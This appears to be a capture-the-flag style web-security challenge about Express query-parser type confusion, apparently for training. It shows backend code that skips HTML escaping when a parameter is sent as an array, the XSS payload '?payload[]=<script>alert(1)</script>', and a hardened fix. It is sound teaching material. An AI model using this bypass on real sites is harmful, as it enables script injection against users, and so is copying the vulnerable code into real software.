Level 12: Express Type Confusion
MISSION: The server-side WAF perfectly sanitizes strings. Find a way to alter your GET request parameters so the backend sees an Array instead of a String, bypassing the WAF entirely.
/// SOURCE CODE INSPECTOR ///
// Backend Express Logic (req.query is filled by Express's default query parser)
let payload = req.query.payload;   // a string, or an Array when the key is repeated or ends in []
if (typeof payload === 'string') { // the escaping below only runs when payload is a string
  payload = payload.replace(/</g, '&lt;').replace(/>/g, '&gt;');
}
res.send("<div id='log'>" + payload + "</div>"); // an Array is joined by Array.prototype.toString, unescaped
/// DECRYPTION COMPLETE ///
By default, Express.js parses duplicate URL parameters (and any key written with a trailing []) into an Array. The backend checks typeof payload === 'string' before applying the sanitization, so an Array skips the if block entirely. When the Array is concatenated into the response string, Array.prototype.toString joins its elements into the HTML unescaped, and the browser executes the payload.
Payload (Manually edit the URL):
?payload[]=<script>alert(1)</script>
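The type confusion above, as an added example that is not part of the challenge's own code: a small stand-in for Express's default "extended" query parser (the parseQuery function is an assumption that mimics two qs behaviours, a trailing [] and duplicate keys both yielding arrays), the page's vulnerable render step, and a hardened version that rejects anything that is not exactly one string.

```javascript
// Added example (not the challenge's own code). parseQuery mimics qs, it is not qs.
const decode = (s) => { try { return decodeURIComponent(s.replace(/\+/g, ' ')); } catch { return s; } };

function parseQuery(search) {
  const query = {};
  for (const pair of search.replace(/^\?/, '').split('&')) {
    if (!pair) continue;
    const eq = pair.indexOf('=');
    const rawKey = eq === -1 ? pair : pair.slice(0, eq);
    const value = decode(eq === -1 ? '' : pair.slice(eq + 1));
    const bracket = rawKey.endsWith('[]');
    const key = decode(bracket ? rawKey.slice(0, -2) : rawKey);
    if (Object.prototype.hasOwnProperty.call(query, key)) {
      query[key] = [].concat(query[key], value);   // duplicate key: promote to array
    } else {
      query[key] = bracket ? [value] : value;       // "key[]" is an array even when sent once
    }
  }
  return query;
}

// Escape every HTML-significant character, not only < and >.
function escapeHtml(s) {
  return s.replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;')
          .replace(/"/g, '&quot;').replace(/'/g, '&#39;');
}

// The page's vulnerable logic: the typeof guard is skipped for arrays, and string
// concatenation calls Array.prototype.toString, which joins elements unescaped.
function renderVulnerable(query) {
  let payload = query.payload;
  if (typeof payload === 'string') payload = escapeHtml(payload);
  return "<div id='log'>" + payload + "</div>";
}

// Hardened: anything that is not exactly one string is rejected before it reaches
// the template, and the string path is escaped. Express's documented
// app.set('query parser', 'simple') alone is not enough: duplicate keys still
// become arrays there, so the type check is the real fix.
function renderHardened(query) {
  const payload = query.payload;
  if (typeof payload !== 'string') return { status: 400, body: 'payload must be a single string' };
  return { status: 200, body: "<div id='log'>" + escapeHtml(payload) + "</div>" };
}

const marker = '<script>alert(1)</script>';   // the challenge's own probe string
console.log(renderVulnerable(parseQuery('?payload[]=' + marker)).includes(marker)); // true
console.log(renderHardened(parseQuery('?payload[]=' + marker)).status);             // 400
```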